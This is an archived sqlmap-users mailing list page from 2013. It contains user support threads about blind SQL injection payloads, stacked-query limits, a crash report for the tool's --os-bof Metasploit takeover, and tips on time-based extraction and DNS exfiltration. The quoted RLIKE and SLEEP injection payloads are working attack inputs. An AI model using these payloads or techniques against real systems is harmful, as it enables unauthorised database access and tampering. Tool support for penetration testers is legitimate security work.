Hi Bruno, On 18 February 2013 00:03, Bruno Garcia <gar...@gm...> wrote: > Also, it shows that it detected two injections, and it's using the first one > for doing the queries, is there anyway I could test the queries with the > second injection? --technique T to force only time-based SQL injection. Refer to the user's manual for further details on --technique switch. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Miroslav S. <mir...@gm...> - 2013-02-18 08:17:45
|
Hi. It's very simple. If stacking of queries is not supported (e.g. id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple. Bye Dana 18.2.2013. 01:04 "Bruno Garcia" <gar...@gm...> je napisao/la: > Hello, > > I have this injection: > > Place: POST > Parameter: xxxxx > Type: boolean-based blind > Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY > clause (RLIKE) > Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND > 'qGgA'='qGgA > Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28) > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 OR time-based blind > Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC > Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > > > and I get this when using UPDATE > > [WARNING] execution of custom SQL queries is only available when stacked > queries are supported. > > Is there any workaround for this? > Also, it shows that it detected two injections, and it's using the first > one for doing the queries, is there anyway I could test the queries with > the second injection? > > Thanks > > > > > > > ------------------------------------------------------------------------------ > The Go Parallel Website, sponsored by Intel - in partnership with Geeknet, > is your hub for all things parallel software development, from weekly > thought > leadership blogs to news, videos, case studies, tutorials, tech docs, > whitepapers, evaluation guides, and opinion stories. Check out the most > recent posts - join the conversation now. > http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Leon J. <leo...@gm...> - 2013-02-18 08:03:56
|
On Monday, February 18, 2013, Bruno Garcia wrote: > Hello, > > I have this injection: > > Place: POST > Parameter: xxxxx > Type: boolean-based blind > Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY > clause (RLIKE) > Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND > 'qGgA'='qGgA > Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28) > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 OR time-based blind > Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC > Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > > > and I get this when using UPDATE > > [WARNING] execution of custom SQL queries is only available when stacked > queries are supported. > > Is there any workaround for this? > Also, it shows that it detected two injections, and it's using the first > one for doing the queries, is there anyway I could test the queries with > the second injection? > Hello, I am not at a computer now, so this is out of my head. If you want to test a specific parameter, use -p parameter_name , if you want to use a specific injection type that was detected, use --type=E as an example for error based injection. -- Regards L. Sent using electronic mail ツ |
|
From: Bruno G. <gar...@gm...> - 2013-02-18 00:03:47
|
Hello,
I have this injection:
Place: POST
Parameter: xxxxx
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause (RLIKE)
Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
'qGgA'='qGgA
Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
and I get this when using UPDATE
[WARNING] execution of custom SQL queries is only available when stacked
queries are supported.
Is there any workaround for this?
Also, it shows that it detected two injections, and it's using the first
one for doing the queries, is there anyway I could test the queries with
the second injection?
Thanks
|
|
From: Miroslav S. <mir...@gm...> - 2013-02-15 08:55:48
|
Hi. Thank you for your report. Find it fixed now [1]. Bye [1] https://github.com/sqlmapproject/sqlmap/commit/5d068896a95fa61d1bfbb4263a10701764d45091 On Fri, Feb 15, 2013 at 9:38 AM, joyal 8x <jo...@gm...> wrote: > sqlmap version: 1.0-dev-87db5d0 > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -u ********************************************* > --data=zipcode=1 -p zipcode --tmp-path=C:/Windows/Temp/ --os-bof > Technique: STACKED > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 87, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 572, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 169, in > action > conf.dbmsHandler.osBof() > File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 353, > in osBof > self.bof() > File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 656, in > bof > debugMsg += "with return code %s" % > self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow) > File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 508, in > _controlMsfCmd > func() > File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/takeover.py", > line 138, in spHeapOverflow > """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], > addrs[6], addrs[7], shellcodeChar) > IndexError: string index out of range > > [*] shutting down at 14:29:28 > > Exception AttributeError: "'NoneType' object has no attribute 'error'" in > <bound method Popen.__del__ of <lib.core.subprocessng.Popen object at > 0x8ab0d4c>> ignored > > > -- > joyal8x > > > ------------------------------------------------------------------------------ > Free Next-Gen Firewall Hardware Offer > Buy your Sophos next-gen firewall before the end March 2013 > and get the hardware for free! Learn more. > http://p.sf.net/sfu/sophos-d2d-feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: joyal 8x <jo...@gm...> - 2013-02-15 08:38:36
|
sqlmap version: 1.0-dev-87db5d0
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u *********************************************
--data=zipcode=1 -p zipcode --tmp-path=C:/Windows/Temp/ --os-bof
Technique: STACKED
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 87, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line 572,
in start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 169, in
action
conf.dbmsHandler.osBof()
File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 353, in
osBof
self.bof()
File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 656, in
bof
debugMsg += "with return code %s" %
self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 508, in
_controlMsfCmd
func()
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/takeover.py",
line 138, in spHeapOverflow
""" % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5],
addrs[6], addrs[7], shellcodeChar)
IndexError: string index out of range
[*] shutting down at 14:29:28
Exception AttributeError: "'NoneType' object has no attribute 'error'" in
<bound method Popen.__del__ of <lib.core.subprocessng.Popen object at
0x8ab0d4c>> ignored
--
joyal8x
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2013-02-13 10:03:31
|
Hi, On 13 February 2013 09:56, Владимир Мартьянов <vil...@gm...> wrote: >> >> Morale of story goes like this. Time-based injections are fragile and you'll need to have LOTS of patience with those. >> > I know... But if it's the only one way I have no choice. Have you considered giving a go to --dns-domain to verify whether or not you could exfiltrate data out-of-band via DNS requests? This has been implemented in sqlmap in mid 2012 and is documented by Miroslav here[1] and here[2]. [1] http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281 [2] http://www.slideshare.net/stamparm/ph-days-2012miroslavstampardataretrievaloverdnsinsqlinjectionattackspaper -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Владимир М. <vil...@gm...> - 2013-02-13 09:57:00
|
2013/2/13 Miroslav Stampar <mir...@gm...> > This means basically this. If you know that columns for table users in > database testdb were invalid, just run this one time: > > --fresh-queries -T users -D testdb --columns > > That way you'll "refresh" session file with new entries containing this > time valid data > > Will try it! Thank you! > Morale of story goes like this. Time-based injections are fragile and > you'll need to have LOTS of patience with those. > > I know... But if it's the only one way I have no choice. |
|
From: Miroslav S. <mir...@gm...> - 2013-02-13 09:54:44
|
This means basically this. If you know that columns for table users in database testdb were invalid, just run this one time: --fresh-queries -T users -D testdb --columns That way you'll "refresh" session file with new entries containing this time valid data Morale of story goes like this. Time-based injections are fragile and you'll need to have LOTS of patience with those. Kind regards, Miroslav Stampar On Wed, Feb 13, 2013 at 10:50 AM, Владимир Мартьянов <vil...@gm...>wrote: > > > 2013/2/13 Miroslav Stampar <mir...@gm...> > >> all data again (excluding SQLi detection), but it won't invalidate >> previous data in session file (like --flush-session). >> > > OK, Thankyou! > -- Miroslav Stampar http://about.me/stamparm |
|
From: Владимир М. <vil...@gm...> - 2013-02-13 09:50:06
|
2013/2/13 Miroslav Stampar <mir...@gm...> > all data again (excluding SQLi detection), but it won't invalidate > previous data in session file (like --flush-session). > OK, Thankyou! |
|
From: Miroslav S. <mir...@gm...> - 2013-02-13 09:47:40
|
all data again (excluding SQLi detection), but it won't invalidate previous data in session file (like --flush-session). there is no way to make a new switch to invalidate just a one entry for this and that inside the whole sqlmap workflow. On Wed, Feb 13, 2013 at 10:45 AM, Владимир Мартьянов <vil...@gm...>wrote: > Will --fresh-queries works only with data containing errors or it'll > retrieve all data again? > -- Miroslav Stampar http://about.me/stamparm |
48 messages has been excluded from this view by a project administrator.
